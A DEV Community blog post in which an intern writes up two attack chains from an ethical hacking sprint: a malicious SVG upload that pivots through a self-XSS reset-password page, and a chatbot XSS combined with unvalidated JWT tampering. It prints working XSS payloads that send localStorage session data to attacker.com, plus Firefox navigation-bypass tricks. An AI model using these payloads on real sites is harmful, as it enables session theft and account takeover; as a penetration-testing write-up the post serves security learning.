DEV Community

Cover image for Cyblack internship Ethical hacking sprint write-up
ali eltaib
ali eltaib

Posted on

Cyblack internship Ethical hacking sprint write-up

#api #cybersecurity #infosec #security

One of the most exciting parts of my Ethical Hacking sprint with CyBlack was moving beyond single findings and thinking in terms of attack chains and real-world impact.
A vulnerability on its own may seem low or medium risk, but during this sprint I focused on how multiple weaknesses can be combined to create high-impact exploitation paths.

This is a walk through to 2 of my favorite findings :

1- First Multi-Stage Chain Exploit

The Issue

We couldn’t directly access session-related values because the SVG payload executes on the API endpoint, which is considered a different origin due to running on a different port than the main web application.

To overcome this, the idea was to pivot the execution context:

Redirect the user from the API endpoint → to the /reset-password endpoint
This endpoint is vulnerable to self-XSS via the code parameter
This allows execution within the main application origin, enabling access to session data

A reasonable question is: why not just use the reset password XSS directly?

The answer is stealth and user perception:

The /reset-password URL may raise suspicion
The SVG URL appears benign (e.g., a shared image)
Additionally, exposing files in the /uploads directory without authentication is itself a bad practice

Chain of Thought

Initial payload:

<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400" viewBox="0 0 124 124" fill="none">
<rect width="124" height="124" rx="24" fill="#000000"/>
   <script type="text/javascript">  
       var xssPayload = "<img src=x onerror=\"fetch('https://attacker.com/steal?data=' + btoa(localStorage.getItem('user')))\">";

    var target = "http://target.com/reset-password?email=hacker@cyber.com&code=" + encodeURIComponent(xssPayload);

    window.location.href = target;

   </script>
</svg>
Enter fullscreen mode Exit fullscreen mode

This didn’t consistently trigger the request, so I switched to using an SVG onload event, which forces execution immediately:

<svg onload="fetch('https://attacker.com/steal?data=' + btoa(localStorage.getItem('user')))">
Enter fullscreen mode Exit fullscreen mode

Issue Encountered: SVG Parsing Error

Error:

AttValue: " or ' expected

This happens because SVG is an XML document, and the parser processes special characters (<, >, ") before JavaScript execution.

The nested quotes inside the payload caused the XML parser to misinterpret the structure.

Solution: CDATA Section

To fix this, I wrapped the JavaScript inside a CDATA block, which tells the XML parser to treat the content as raw text.

Final working payload:

<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400" viewBox="0 0 124 124">
  <rect width="124" height="124" rx="24" fill="#000000"/>
  <script type="text/javascript">
    <![CDATA[
      // Using CDATA prevents the XML parser from breaking on quotes or < > symbols
      var xssPayload = "<svg onload=\"fetch('https://attacker.com/steal?data=' + btoa(localStorage.getItem('user')))\">";

      var target = "http://target.com/reset-password?email=hacker@cyber.com&code=" + encodeURIComponent(xssPayload);

      window.location.href = target;
    ]]>
  </script>
</svg>
Enter fullscreen mode Exit fullscreen mode

Firefox Breakout Issue

Interestingly, the exploit worked in Chrome but not in Firefox.

This highlights the browser security differences:

Navigation blocking: Firefox restricts automatic redirects from untrusted contexts (like XML/SVG)
Storage partitioning: Data access depends on how the page is loaded (top-level vs embedded)
Frame restrictions: Prevent unauthorized top-level navigation
Bypass Techniques

To make the exploit work in Firefox:

Use setTimeout() to delay execution (bypasses immediate navigation blocking)
Use window.top to escape the SVG context
Use location.replace() instead of href to bypass navigation protections

2- Second Multi-Stage Chain: Chatbot Account Takeover

Initial Finding

A reflected XSS vulnerability was identified in the chatbot interface.

JavaScript payloads were successfully executed
However, the impact was limited when used alone
Escalation Strategy

To increase impact, I looked for ways to:

make the payload execute in another user’s context

JWT Tampering Discovery

The application retrieves chat history based on a user ID stored in the JWT.

This JWT was not properly validated, allowing:

  • Modification of the user ID
  • Impersonation of other users
  • Exploit Chain
  • Modify JWT → impersonate another user (e.g., admin/doctor)
  • Send a malicious message via chatbot
  • The message is rendered in the victim’s chat interface
  • XSS payload executes in the victim’s browser
  • Session data is exfiltrated

Payload Used

<img src=x onerror="new Image().src='https://attacker.com/?d=' + btoa(localStorage.getItem('user'));">
Enter fullscreen mode Exit fullscreen mode

Impact

This chain significantly increases severity:

  1. Account takeover
  2. Privilege escalation (e.g., accessing sensitive data)
  3. Cross-user attack execution
  4. Persistent XSS (if chat history is stored)
  5. Internal phishing & spoofing attacks

It also bypasses protections like:

  • IP restrictions
  • Geo-fencing

Because the attack originates from a legitimate user session

Extended Abuse Scenarios
Injecting fake login forms within the chat window
Spoofing support messages
Delivering phishing payloads through trusted channels

Top comments (0)